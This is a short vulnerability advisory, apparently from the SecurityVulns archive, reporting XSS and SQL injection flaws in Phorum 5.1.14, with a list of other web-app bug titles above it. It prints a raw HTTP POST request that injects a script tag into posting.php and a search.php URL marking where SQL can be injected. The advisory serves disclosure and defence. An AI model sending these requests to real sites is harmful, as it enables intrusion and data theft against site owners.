Information Security


Additional information

  Daily summary of bugs in Web applications (PHP, ASP, JSP, CGI, Perl)

  PHP Live! v3.2 (header.php) Remote File Include Vulnerabilities

  [KurdishVanilla CMS <= 1.0.1 (RootDirectory) Remote file inclusion Vuln.]

  [Kurdish Security # 14] MoSpray [base_dir] Remote Command Execution [ Mambo & Joomla]

  DotClear : Multiples Full Path Disclosure

From: securityconnection_(at)_gmail.com <securityconnection_(at)_gmail.com>
Date: 24 July 2006
Subject: Phorum 5.1.14 XSS SQL injection Vulnerability

Phorum 5.1.14
http://www.phorum.org
--------------------------
Cross Site Scripting (XSS)
--------------------------
POST http://target.xx:80/posting.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 447
message_id=0&forum_id=1&mode=<script>alert(/EllipsisSecurityTest/)</script>
-------------
SQL injection
-------------
http://target.xx/search.php?1,search=1,page='[SQL]
-----------------
Ellipsis Security
http://www.ellsec.org

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod